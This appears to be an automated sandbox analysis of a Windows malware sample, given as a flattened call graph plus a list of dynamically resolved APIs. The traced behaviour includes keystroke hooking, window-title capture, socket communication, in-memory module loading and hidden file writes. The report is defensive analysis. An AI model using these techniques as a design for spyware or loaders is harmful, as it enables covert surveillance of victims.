53407->53410 53411 4082a8 28 API calls 53407->53411 53413 40b0dd 28 API calls 53407->53413 53414 40ae58 44 API calls 2 library calls 53407->53414 53415 440c51 53407->53415 53419 404c9e 28 API calls 53407->53419 53408->53407 53409->53407 53410->53407 53411->53407 53412->53397 53413->53407 53414->53407 53416 440c5d 53415->53416 53420 440a4d 53416->53420 53419->53407 53421 440a64 53420->53421 53425 440aa5 53421->53425 53426 445354 20 API calls _Atexit 53421->53426 53423 440a9b 53427 43a827 26 API calls _Deallocate 53423->53427 53425->53407 53426->53423 53427->53425 53429 409a63 GetMessageA 53428->53429 53430 4099ff GetModuleHandleA SetWindowsHookExA 53428->53430 53431 409a75 TranslateMessage DispatchMessageA 53429->53431 53442 40999c 53429->53442 53430->53429 53432 409a1b GetLastError 53430->53432 53431->53429 53431->53442 53443 41ad46 53432->53443 53436 409a3e 53437 401f66 28 API calls 53436->53437 53438 409a4d 53437->53438 53439 41a686 79 API calls 53438->53439 53440 409a52 53439->53440 53441 401eea 26 API calls 53440->53441 53441->53442 53444 440c51 26 API calls 53443->53444 53445 41ad67 53444->53445 53446 401f66 28 API calls 53445->53446 53447 409a31 53446->53447 53448 404c9e 28 API calls 53447->53448 53448->53436 53450 409e5d Sleep 53449->53450 53469 409d97 53450->53469 53452 4099b2 53453 409e9d CreateDirectoryW 53457 409e6f 53453->53457 53454 409eae GetFileAttributesW 53454->53457 53455 409ec5 SetFileAttributesW 53455->53457 53457->53450 53457->53452 53457->53453 53457->53454 53457->53455 53459 401d64 28 API calls 53457->53459 53462 409f10 53457->53462 53482 41b58f 53457->53482 53458 409f3f PathFileExistsW 53458->53462 53459->53457 53461 401f86 28 API calls 53461->53462 53462->53458 53462->53461 53463 40a048 SetFileAttributesW 53462->53463 53464 406052 28 API calls 53462->53464 53465 401eef 26 API calls 53462->53465 53467 401eea 26 API calls 53462->53467 53468 401eea 26 API calls 53462->53468 53491 41b61a CreateFileW 53462->53491 53499 41b687 CreateFileW SetFilePointer WriteFile CloseHandle 53462->53499 53463->53457 53464->53462 53465->53462 53467->53462 53468->53457 53470 409e44 53469->53470 53472 409dad 53469->53472 53470->53457 53471 409dcc CreateFileW 53471->53472 53473 409dda GetFileSize 53471->53473 53472->53471 53474 409e0f CloseHandle 53472->53474 53475 409e21 53472->53475 53476 409e04 Sleep 53472->53476 53477 409dfd 53472->53477 53473->53472 53473->53474 53474->53472 53475->53470 53479 4082dc 28 API calls 53475->53479 53476->53474 53500 40a7f0 83 API calls 53477->53500 53480 409e3d 53479->53480 53481 4098a5 127 API calls 53480->53481 53481->53470 53483 41b5a2 CreateFileW 53482->53483 53485 41b5db 53483->53485 53486 41b5df 53483->53486 53485->53457 53487 41b5f6 WriteFile 53486->53487 53488 41b5e6 SetFilePointer 53486->53488 53489 41b60b CloseHandle 53487->53489 53490 41b609 53487->53490 53488->53487 53488->53489 53489->53485 53490->53489 53492 41b640 53491->53492 53493 41b644 GetFileSize 53491->53493 53492->53462 53501 401e65 53493->53501 53495 41b658 53496 41b66a ReadFile 53495->53496 53497 41b677 53496->53497 53498 41b679 CloseHandle 53496->53498 53497->53498 53498->53492 53499->53462 53500->53476 53502 401e6d 53501->53502 53504 401e77 53502->53504 53505 4023b7 28 API calls 53502->53505 53504->53495 53505->53504 53508 402d97 53507->53508 53511 4030f7 53508->53511 53510 402dab 53510->53327 53512 403101 53511->53512 53514 403115 53512->53514 53515 4036c2 28 API calls 53512->53515 53514->53510 53515->53514 53517 403b48 53516->53517 53523 403b7a 53517->53523 53520 403cbb 53527 403dc2 53520->53527 53522 403cc9 53522->52980 53524 403b86 53523->53524 53525 403b9e 28 API calls 53524->53525 53526 403b5a 53525->53526 53526->53520 53528 403dce 53527->53528 53531 402ffd 53528->53531 53530 403de3 53530->53522 53532 40300e 53531->53532 53533 4032a4 28 API calls 53532->53533 53534 40301a 53533->53534 53536 40302e 53534->53536 53537 4035e8 28 API calls 53534->53537 53536->53530 53537->53536 53544 4395ba 53538->53544 53542 412814 53541->53542 53543 4127ed RegSetValueExA RegCloseKey 53541->53543 53542->53006 53543->53542 53547 43953b 53544->53547 53546 401608 53546->53004 53548 43954a 53547->53548 53549 43955e 53547->53549 53555 445354 20 API calls _Atexit 53548->53555 53553 43955a __alldvrm 53549->53553 53557 447601 11 API calls 2 library calls 53549->53557 53552 43954f 53556 43a827 26 API calls _Deallocate 53552->53556 53553->53546 53555->53552 53556->53553 53557->53553 53559 41aab9 ctype ___scrt_fastfail 53558->53559 53560 401f66 28 API calls 53559->53560 53561 41ab2e 53560->53561 53561->53010 53562->53026 53564 413fb3 WSASetLastError 53563->53564 53565 413fa9 53563->53565 53564->53091 53711 413e37 35 API calls ___std_exception_copy 53565->53711 53567 413fae 53567->53564 53570 404206 socket 53569->53570 53571 4041fd 53569->53571 53572 404220 53570->53572 53573 404224 CreateEventW 53570->53573 53712 404262 WSAStartup 53571->53712 53572->53091 53573->53091 53575 404202 53575->53570 53575->53572 53577 4049b1 53576->53577 53578 40492a 53576->53578 53577->53091 53579 404933 53578->53579 53580 404987 CreateEventA CreateThread 53578->53580 53581 404942 GetLocalTime 53578->53581 53579->53580 53580->53577 53714 404b1d 53580->53714 53582 41ad46 28 API calls 53581->53582 53583 40495b 53582->53583 53713 404c9e 28 API calls 53583->53713 53585 404968 53586 401f66 28 API calls 53585->53586 53587 404977 53586->53587 53588 41a686 79 API calls 53587->53588 53589 40497c 53588->53589 53590 401eea 26 API calls 53589->53590 53590->53580 53592 4043e1 53591->53592 53593 4042b3 53591->53593 53594 404343 53592->53594 53595 4043e7 WSAGetLastError 53592->53595 53593->53594 53596 4042e8 53593->53596 53599 404cbf 28 API calls 53593->53599 53594->53091 53595->53594 53597 4043f7 53595->53597 53718 420151 27 API calls 53596->53718 53600 4042f7 53597->53600 53601 4043fc 53597->53601 53603 4042d4 53599->53603 53607 401f66 28 API calls 53600->53607 53723 41bc76 30 API calls 53601->53723 53602 4042f0 53602->53600 53606 404306 53602->53606 53608 401f66 28 API calls 53603->53608 53605 40440b 53724 404c9e 28 API calls 53605->53724 53616 404315 53606->53616 53617 40434c 53606->53617 53610 404448 53607->53610 53611 4042e3 53608->53611 53614 401f66 28 API calls 53610->53614 53612 41a686 79 API calls 53611->53612 53612->53596 53613 404418 53615 401f66 28 API calls 53613->53615 53618 404457 53614->53618 53619 404427 53615->53619 53621 401f66 28 API calls 53616->53621 53720 420f34 56 API calls 53617->53720 53622 41a686 79 API calls 53618->53622 53623 41a686 79 API calls 53619->53623 53625 404324 53621->53625 53622->53594 53626 40442c 53623->53626 53624 404354 53627 404389 53624->53627 53628 404359 53624->53628 53629 401f66 28 API calls 53625->53629 53631 401eea 26 API calls 53626->53631 53722 4202ea 28 API calls 53627->53722 53632 401f66 28 API calls 53628->53632 53633 404333 53629->53633 53631->53594 53635 404368 53632->53635 53636 41a686 79 API calls 53633->53636 53634 404391 53637 4043be CreateEventW CreateEventW 53634->53637 53640 401f66 28 API calls 53634->53640 53638 401f66 28 API calls 53635->53638 53639 404338 53636->53639 53637->53594 53641 404377 53638->53641 53719 41dc15 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 53639->53719 53643 4043a7 53640->53643 53644 41a686 79 API calls 53641->53644 53645 401f66 28 API calls 53643->53645 53646 40437c 53644->53646 53647 4043b6 53645->53647 53721 420592 54 API calls 53646->53721 53649 41a686 79 API calls 53647->53649 53650 4043bb 53649->53650 53650->53637 53725 41a945 GlobalMemoryStatusEx 53651->53725 53653 41a982 53653->53091 53726 413646 53654->53726 53658 40cc0d 53657->53658 53659 41246e 3 API calls 53658->53659 53661 40cc14 53659->53661 53660 40cc2c 53660->53091 53661->53660 53662 4124b7 3 API calls 53661->53662 53662->53660 53664 401f86 28 API calls 53663->53664 53665 41ae03 53664->53665 53665->53091 53666->53091 53668 436050 ___scrt_fastfail 53667->53668 53669 41ac71 GetForegroundWindow GetWindowTextW 53668->53669 53670 403b40 28 API calls 53669->53670 53671 41ac9b 53670->53671 53671->53091 53673 401f66 28 API calls 53672->53673 53674 40e69e 53673->53674 53674->53091 53676 4027f8 53675->53676 53677 402e78 28 API calls 53676->53677 53678 402814 53677->53678 53678->53091 53682 4045ec 53679->53682 53680 43a88c _Yarn 21 API calls 53680->53682 53682->53680 53683 401f86 28 API calls 53682->53683 53684 401eef 26 API calls 53682->53684 53685 404666 53682->53685 53688 401eea 26 API calls 53682->53688 53767 40455b 53682->53767 53773 404688 53682->53773 53683->53682 53684->53682 53686 4047eb 98 API calls 53685->53686 53687 40466d 53686->53687 53689 401eea 26 API calls 53687->53689 53688->53682 53690 404676 53689->53690 53691 401eea 26 API calls 53690->53691 53692 40467f 53691->53692 53692->53091 53694->53091 53695->53091 53696->53091 53697->53091 53699 404805 SetEvent CloseHandle 53698->53699 53700 40481c closesocket 53698->53700 53701 40489c 53699->53701 53702 404829 53700->53702 53701->53091 53703 40483f 53702->53703 54173 404ab1 83 API calls 53702->54173 53705 404851 WaitForSingleObject 53703->53705 53706 404892 SetEvent CloseHandle 53703->53706 54174 41dc15 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 53705->54174 53706->53701 53708 404860 SetEvent WaitForSingleObject 54175 41dc15 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 53708->54175 53710 404878 SetEvent CloseHandle CloseHandle 53710->53706 53711->53567 53712->53575 53713->53585 53717 404b29 101 API calls 53714->53717 53716 404b26 53717->53716 53718->53602 53719->53594 53720->53624 53721->53639 53722->53634 53723->53605 53724->53613 53725->53653 53729 413619 53726->53729 53730 41362e ___scrt_initialize_default_local_stdio_options 53729->53730 53733 43e2dd 53730->53733 53736 43b030 53733->53736 53737 43b070 53736->53737 53738 43b058 53736->53738 53737->53738 53740 43b078 53737->53740 53760 445354 20 API calls _Atexit 53738->53760 53762 4392de 38 API calls 3 library calls 53740->53762 53741 43b05d 53761 43a827 26 API calls _Deallocate 53741->53761 53744 43b088 53763 43b7b6 20 API calls 2 library calls 53744->53763 53747 43b100 53764 43be24 50 API calls 3 library calls 53747->53764 53748 41363c 53748->53091 53751 43b068 53753 433d2c 53751->53753 53752 43b10b 53765 43b820 20 API calls _free 53752->53765 53754 433d37 IsProcessorFeaturePresent 53753->53754 53755 433d35 53753->53755 53757 4341a4 53754->53757 53755->53748 53766 434168 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 53757->53766 53759 434287 53759->53748 53760->53741 53761->53751 53762->53744 53763->53747 53764->53752 53765->53751 53766->53759 53768 404592 recv 53767->53768 53769 404565 WaitForSingleObject 53767->53769 53770 4045a5 53768->53770 53786 420556 56 API calls 53769->53786 53770->53682 53772 404581 SetEvent 53772->53770 53781 4046a3 53773->53781 53774 4047d8 53775 401eea 26 API calls 53774->53775 53776 4047e1 53775->53776 53776->53682 53777 403b60 28 API calls 53777->53781 53778 401fbd 28 API calls 53778->53781 53779 401ebd 28 API calls 53780 404772 CreateEventA CreateThread WaitForSingleObject CloseHandle 53779->53780 53780->53781 54091 414b9b 53780->54091 53781->53774 53781->53777 53781->53778 53781->53779 53782 401eef 26 API calls 53781->53782 53783 401eea 26 API calls 53781->53783 53785 402654 26 API calls 53781->53785 53787 411b60 53781->53787 53782->53781 53783->53781 53785->53781 53786->53772 53788 411b72 53787->53788 53789 403b60 28 API calls 53788->53789 53790 411b85 53789->53790 53791 401fbd 28 API calls 53790->53791 53792 411b94 53791->53792 53793 401fbd 28 API calls 53792->53793 53794 411ba3 53793->53794 53795 41afc3 28 API calls 53794->53795 53796 411bac 53795->53796 53797 411c60 53796->53797 53799 401d64 28 API calls 53796->53799 53798 401d8c 26 API calls 53797->53798 53800 411c69 53798->53800 53801 411bc8 53799->53801 53802 401eea 26 API calls 53800->53802 53803 401fbd 28 API calls 53801->53803 53805 411c72 53802->53805 53804 411bd0 53803->53804 53806 401d64 28 API calls 53804->53806 53807 401eea 26 API calls 53805->53807 53808 411be0 53806->53808 53809 411c7a 53807->53809 53810 401fbd 28 API calls 53808->53810 53809->53781 53811 411be8 53810->53811 53812 401d64 28 API calls 53811->53812 53813 411bf8 53812->53813 53814 401fbd 28 API calls 53813->53814 53815 411c00 53814->53815 53816 401d64 28 API calls 53815->53816 53817 411c10 53816->53817 53818 401fbd 28 API calls 53817->53818 53819 411c18 53818->53819 53820 401d64 28 API calls 53819->53820 53821 411c28 53820->53821 53822 401fbd 28 API calls 53821->53822 53823 411c30 53822->53823 53824 401d64 28 API calls 53823->53824 53825 411c43 53824->53825 53826 401fbd 28 API calls 53825->53826 53827 411c4b 53826->53827 53831 411c81 GetModuleFileNameW 53827->53831 53830 4047eb 98 API calls 53830->53797 53853 411cac 53831->53853 53832 41ab38 42 API calls 53832->53853 53833 40c854 32 API calls 53833->53853 53834 401eea 26 API calls 53834->53853 53835 403b40 28 API calls 53835->53853 53836 403cbb 28 API calls 53836->53853 53837 403cdc 28 API calls 53837->53853 53838 4028cf 28 API calls 53838->53853 53839 401e13 26 API calls 53839->53853 53840 411dea Sleep 53840->53853 53841 4176b6 31 API calls 53841->53853 53842 411e8c Sleep 53842->53853 53843 411f2e Sleep 53843->53853 53844 411f90 DeleteFileW 53844->53853 53845 41b61a 32 API calls 53845->53853 53846 411fc7 DeleteFileW 53846->53853 53847 412019 Sleep 53847->53853 53848 412003 DeleteFileW 53848->53853 53849 412092 53850 401e13 26 API calls 53849->53850 53851 41209e 53850->53851 53852 401e13 26 API calls 53851->53852 53854 4120aa 53852->53854 53853->53832 53853->53833 53853->53834 53853->53835 53853->53836 53853->53837 53853->53838 53853->53839 53853->53840 53853->53841 53853->53842 53853->53843 53853->53844 53853->53845 53853->53846 53853->53847 53853->53848 53853->53849 53856 41205e Sleep 53853->53856 53855 401e13 26 API calls 53854->53855 53857 4120b6 53855->53857 53859 401e13 26 API calls 53856->53859 53858 40b027 28 API calls 53857->53858 53860 4120c9 53858->53860 53864 41206e 53859->53864 53862 401fbd 28 API calls 53860->53862 53861 401e13 26 API calls 53861->53864 53863 4120e9 53862->53863 53973 4123f7 53863->53973 53864->53853 53864->53861 53866 412090 53864->53866 53866->53857 53868 401e13 26 API calls 53869 412100 53868->53869 53870 412125 53869->53870 53871 412274 53869->53871 53873 41aec8 28 API calls 53870->53873 53985 41aec8 53871->53985 53875 412131 53873->53875 53877 41ad46 28 API calls 53875->53877 53876 4027ec 28 API calls 53879 4122b2 53876->53879 53878 412146 53877->53878 53881 4027ec 28 API calls 53878->53881 53880 4027cb 28 API calls 53879->53880 53882 4122c1 53880->53882 53883 412176 53881->53883 53884 4027cb 28 API calls 53882->53884 53885 4027cb 28 API calls 53883->53885 53886 4122cd 53884->53886 53887 412185 53885->53887 53888 4027cb 28 API calls 53886->53888 53889 4027cb 28 API calls 53887->53889 53890 4122dc 53888->53890 53891 412194 53889->53891 53892 4027cb 28 API calls 53890->53892 53893 4027cb 28 API calls 53891->53893 53894 4122eb 53892->53894 53895 4121a3 53893->53895 53896 4027cb 28 API calls 53894->53896 53897 4027cb 28 API calls 53895->53897 53898 4122fa 53896->53898 53899 4121b2 53897->53899 53900 4027cb 28 API calls 53898->53900 53901 4027cb 28 API calls 53899->53901 53902 412309 53900->53902 53903 4121be 53901->53903 53989 40275c 53902->53989 53905 4027cb 28 API calls 53903->53905 53907 4121ca 53905->53907 53906 412313 53908 404468 60 API calls 53906->53908 53909 40275c 28 API calls 53907->53909 53911 412320 53908->53911 53910 4121d9 53909->53910 53913 4027cb 28 API calls 53910->53913 53912 401eea 26 API calls 53911->53912 53914 41232c 53912->53914 53915 4121e5 53913->53915 53916 401eea 26 API calls 53914->53916 53917 40275c 28 API calls 53915->53917 53918 412338 53916->53918 53919 4121ef 53917->53919 53920 401eea 26 API calls 53918->53920 53921 404468 60 API calls 53919->53921 53922 412344 53920->53922 53923 4121fc 53921->53923 53924 401eea 26 API calls 53922->53924 53925 401eea 26 API calls 53923->53925 53926 412350 53924->53926 53927 412205 53925->53927 53928 401eea 26 API calls 53926->53928 53929 401eea 26 API calls 53927->53929 53930 412359 53928->53930 53931 41220e 53929->53931 53932 401eea 26 API calls 53930->53932 53933 401eea 26 API calls 53931->53933 53934 412362 53932->53934 53935 412217 53933->53935 53936 401eea 26 API calls 53934->53936 53937 401eea 26 API calls 53935->53937 53961 412268 53936->53961 53938 412220 53937->53938 53939 401eea 26 API calls 53938->53939 53940 41222c 53939->53940 53943 401eea 26 API calls 53940->53943 53941 401eea 26 API calls 53942 412374 53941->53942 53944 401e13 26 API calls 53942->53944 53945 412238 53943->53945 53946 412380 53944->53946 53947 401eea 26 API calls 53945->53947 53948 401eea 26 API calls 53946->53948 53949 412244 53947->53949 53950 41238c 53948->53950 53951 401eea 26 API calls 53949->53951 53952 401eea 26 API calls 53950->53952 53953 412250 53951->53953 53954 412398 53952->53954 53955 401eea 26 API calls 53953->53955 53956 401eea 26 API calls 53954->53956 53957 41225c 53955->53957 53958 4123a4 53956->53958 53959 401eea 26 API calls 53957->53959 53960 401eea 26 API calls 53958->53960 53959->53961 53962 4123b0 53960->53962 53961->53941 53963 401eea 26 API calls 53962->53963 53964 4123bc 53963->53964 53965 401eea 26 API calls 53964->53965 53966 4123c8 53965->53966 53967 401eea 26 API calls 53966->53967 53968 4123d4 53967->53968 53969 401eea 26 API calls 53968->53969 53970 4123e0 53969->53970 53971 401eea 26 API calls 53970->53971 53972 411c50 53971->53972 53972->53830 53974 412435 53973->53974 53976 412406 53973->53976 53975 412444 53974->53975 53999 10001c5b 53974->53999 53977 403b40 28 API calls 53975->53977 53996 410b0d 53976->53996 53978 412450 53977->53978 53980 401eea 26 API calls 53978->53980 53982 4120f4 53980->53982 53982->53868 53986 41aed5 53985->53986 53987 401f86 28 API calls 53986->53987 53988 41227d 53987->53988 53988->53876 53990 40276b 53989->53990 53991 4027ad 53990->53991 53993 4027a2 53990->53993 53992 401e9b 28 API calls 53991->53992 53995 4027ab 53992->53995 54090 402ee5 28 API calls 53993->54090 53995->53906 54004 410b19 53996->54004 54000 10001c6b ___scrt_fastfail 53999->54000 54051 100012ee 54000->54051 54002 10001c87 54002->53975 54003 410d8d 28 API calls _Yarn 54003->53974 54035 4105b9 54004->54035 54006 410b38 54008 4105b9 SetLastError 54006->54008 54021 410c1f SetLastError 54006->54021 54032 410b15 54006->54032 54010 410b5f 54008->54010 54009 410bbf GetNativeSystemInfo 54011 410bd6 54009->54011 54010->54009 54010->54010 54010->54021 54010->54032 54011->54021 54038 410abe VirtualAlloc 54011->54038 54013 410bfe 54014 410c26 GetProcessHeap HeapAlloc 54013->54014 54048 410abe VirtualAlloc 54013->54048 54016 410c3d 54014->54016 54017 410c4f 54014->54017 54049 410ad5 VirtualFree 54016->54049 54020 4105b9 SetLastError 54017->54020 54018 410c16 54018->54014 54018->54021 54022 410c98 54020->54022 54021->54032 54023 410d45 54022->54023 54039 410abe VirtualAlloc 54022->54039 54050 410eb0 GetProcessHeap HeapFree 54023->54050 54026 410cb1 ctype 54040 4105cc SetLastError ctype ___scrt_fastfail 54026->54040 54028 410cdd 54028->54023 54041 410975 SetLastError SetLastError 54028->54041 54030 410d04 54030->54023 54042 410769 54030->54042 54032->54003 54033 410d0f 54033->54023 54033->54032 54034 410d3a SetLastError 54033->54034 54034->54023 54036 4105c8 54035->54036 54037 4105bd SetLastError 54035->54037 54036->54006 54037->54006 54038->54013 54039->54026 54040->54028 54041->54030 54045 410790 54042->54045 54043 4106d3 VirtualProtect 54044 410891 54043->54044 54044->54033 54045->54044 54046 4106d3 VirtualProtect 54045->54046 54047 41087f 54045->54047 54046->54045 54047->54043 54048->54018 54049->54021 54050->54032 54052 10001324 ___scrt_fastfail 54051->54052 54053 100013b7 GetEnvironmentVariableW 54052->54053 54077 100010f1 54053->54077 54056 100010f1 57 API calls 54057 10001465 54056->54057 54058 100010f1 57 API calls 54057->54058 54059 10001479 54058->54059 54060 100010f1 57 API calls 54059->54060 54061 1000148d 54060->54061 54062 100010f1 57 API calls 54061->54062 54063 100014a1 54062->54063 54064 100010f1 57 API calls 54063->54064 54065 100014b5 lstrlenW 54064->54065 54066 100014d2 54065->54066 54067 100014d9 lstrlenW 54065->54067 54066->54002 54068 100010f1 57 API calls 54067->54068 54069 10001501 lstrlenW lstrcatW 54068->54069 54070 100010f1 57 API calls 54069->54070 54071 10001539 lstrlenW lstrcatW 54070->54071 54072 100010f1 57 API calls 54071->54072 54073 1000156b lstrlenW lstrcatW 54072->54073 54074 100010f1 57 API calls 54073->54074 54075 1000159d lstrlenW lstrcatW 54074->54075 54076 100010f1 57 API calls 54075->54076 54076->54066 54078 10001118 ___scrt_fastfail 54077->54078 54079 10001129 lstrlenW 54078->54079 54080 10002c40 ___scrt_fastfail 54079->54080 54081 10001148 lstrcatW lstrlenW 54080->54081 54082 10001177 lstrlenW FindFirstFileW 54081->54082 54083 10001168 lstrlenW 54081->54083 54084 100011a0 54082->54084 54085 100011e1 54082->54085 54083->54082 54086 100011c7 FindNextFileW 54084->54086 54087 100011aa 54084->54087 54085->54056 54086->54084 54088 100011da FindClose 54086->54088 54087->54086 54089 10001000 49 API calls 54087->54089 54088->54085 54089->54087 54090->53995 54092 401fbd 28 API calls 54091->54092 54093 414bbd SetEvent 54092->54093 54094 414bd2 54093->54094 54095 403b60 28 API calls 54094->54095 54096 414bec 54095->54096 54097 401fbd 28 API calls 54096->54097 54098 414bfc 54097->54098 54099 401fbd 28 API calls 54098->54099 54100 414c0e 54099->54100 54101 41afc3 28 API calls 54100->54101 54102 414c17 54101->54102 54103 414d8a 54102->54103 54105 414c37 GetTickCount 54102->54105 54165 414d99 54102->54165 54104 401d8c 26 API calls 54103->54104 54106 4161fb 54104->54106 54107 41ad46 28 API calls 54105->54107 54109 401eea 26 API calls 54106->54109 54110 414c4d 54107->54110 54108 414dad 54172 404ab1 83 API calls 54108->54172 54112 416207 54109->54112 54170 41aca0 GetLastInputInfo GetTickCount 54110->54170 54115 401eea 26 API calls 54112->54115 54114 414d7d 54114->54103 54117 416213 54115->54117 54116 414c54 54118 41ad46 28 API calls 54116->54118 54119 414c5f 54118->54119 54120 41ac52 30 API calls 54119->54120 54121 414c6d 54120->54121 54122 41aec8 28 API calls 54121->54122 54123 414c7b 54122->54123 54124 401d64 28 API calls 54123->54124 54125 414c89 54124->54125 54126 4027ec 28 API calls 54125->54126 54127 414c97 54126->54127 54128 40275c 28 API calls 54127->54128 54129 414ca6 54128->54129 54130 4027cb 28 API calls 54129->54130 54131 414cb5 54130->54131 54132 40275c 28 API calls 54131->54132 54133 414cc4 54132->54133 54134 4027cb 28 API calls 54133->54134 54135 414cd0 54134->54135 54136 40275c 28 API calls 54135->54136 54137 414cda 54136->54137 54138 404468 60 API calls 54137->54138 54139 414ce9 54138->54139 54140 401eea 26 API calls 54139->54140 54141 414cf2 54140->54141 54142 401eea 26 API calls 54141->54142 54143 414cfe 54142->54143 54144 401eea 26 API calls 54143->54144 54145 414d0a 54144->54145 54146 401eea 26 API calls 54145->54146 54147 414d16 54146->54147 54148 401eea 26 API calls 54147->54148 54149 414d22 54148->54149 54150 401eea 26 API calls 54149->54150 54151 414d2e 54150->54151 54152 401e13 26 API calls 54151->54152 54153 414d3a 54152->54153 54154 401eea 26 API calls 54153->54154 54155 414d43 54154->54155 54156 401eea 26 API calls 54155->54156 54157 414d4c 54156->54157 54158 401d64 28 API calls 54157->54158 54159 414d57 54158->54159 54160 43a5e7 _strftime 42 API calls 54159->54160 54161 414d64 54160->54161 54162 414d69 54161->54162 54163 414d8f 54161->54163 54166 414d82 54162->54166 54167 414d77 54162->54167 54164 401d64 28 API calls 54163->54164 54164->54165 54165->54103 54165->54108 54168 404915 104 API calls 54166->54168 54171 4049ba 81 API calls 54167->54171 54168->54103 54170->54116 54171->54114 54172->54114 54173->53703 54174->53708 54175->53710 54178 40cc3f 54177->54178 54179 403b9e 28 API calls 54178->54179 54180 40ca3a 54179->54180 54181 402860 54180->54181 54185 40286f 54181->54185 54182 4028b1 54190 402daf 54182->54190 54184 4028af 54184->53135 54185->54182 54186 4028a6 54185->54186 54189 402d68 28 API calls 54186->54189 54188->53114 54189->54184 54191 402dbb 54190->54191 54192 4030f7 28 API calls 54191->54192 54193 402dcd 54192->54193 54193->54184 54196 40e56a 54194->54196 54195 4124b7 3 API calls 54195->54196 54196->54195 54197 40e59c 54196->54197 54199 40e60e 54196->54199 54201 40e5fe Sleep 54196->54201 54198 4082dc 28 API calls 54197->54198 54197->54201 54203 41ae08 28 API calls 54197->54203 54209 401e13 26 API calls 54197->54209 54212 401f66 28 API calls 54197->54212 54216 4126d2 29 API calls 54197->54216 54227 40bf04 73 API calls ___scrt_fastfail 54197->54227 54228 412774 29 API calls 54197->54228 54198->54197 54200 4082dc 28 API calls 54199->54200 54204 40e619 54200->54204 54201->54196 54203->54197 54205 41ae08 28 API calls 54204->54205 54206 40e625 54205->54206 54229 412774 29 API calls 54206->54229 54209->54197 54210 40e638 54211 401e13 26 API calls 54210->54211 54213 40e644 54211->54213 54212->54197 54214 401f66 28 API calls 54213->54214 54215 40e655 54214->54215 54217 4126d2 29 API calls 54215->54217 54216->54197 54218 40e668 54217->54218 54230 411699 TerminateProcess WaitForSingleObject 54218->54230 54220 40e670 ExitProcess 54231 411637 61 API calls 54221->54231 54228->54197 54229->54210 54230->54220 54232 41569e 54233 401d64 28 API calls 54232->54233 54234 4156b3 54233->54234 54235 401fbd 28 API calls 54234->54235 54236 4156bb 54235->54236 54237 401d64 28 API calls 54236->54237 54238 4156cb 54237->54238 54239 401fbd 28 API calls 54238->54239 54240 4156d3 54239->54240 54243 411aed 54240->54243 54244 4041f1 3 API calls 54243->54244 54245 411b01 54244->54245 54246 40428c 96 API calls 54245->54246 54247 411b09 54246->54247 54248 4027ec 28 API calls 54247->54248 54249 411b22 54248->54249 54250 4027cb 28 API calls 54249->54250 54251 411b2c 54250->54251 54252 404468 60 API calls 54251->54252 54253 411b36 54252->54253 54254 401eea 26 API calls 54253->54254 54255 411b3e 54254->54255 54256 4045d5 260 API calls 54255->54256 54257 411b4c 54256->54257 54258 401eea 26 API calls 54257->54258 54259 411b54 54258->54259 54260 401eea 26 API calls 54259->54260 54261 411b5c 54260->54261

                                                                                            Executed Functions

                                                                                            Function 0041BCE3 Relevance: 115.6, APIs: 40, Strings: 26, Instructions: 140libraryloaderCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BCF8
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD01
                                                                                            • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD18
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD1B
                                                                                            • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD2D
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD30
                                                                                            • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD41
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD44
                                                                                            • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD55
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD58
                                                                                            • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD65
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                                                                            • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD75
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                                                                            • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD85
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                                                                            • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BD99
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD9C
                                                                                            • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDA9
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                                                                            • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDBD
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BDC0
                                                                                            • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDD1
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BDD4
                                                                                            • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDE5
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BDE8
                                                                                            • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BDF5
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                                                                            • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE06
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BE09
                                                                                            • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040D783), ref: 0041BE16
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BE19
                                                                                            • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040D783), ref: 0041BE2B
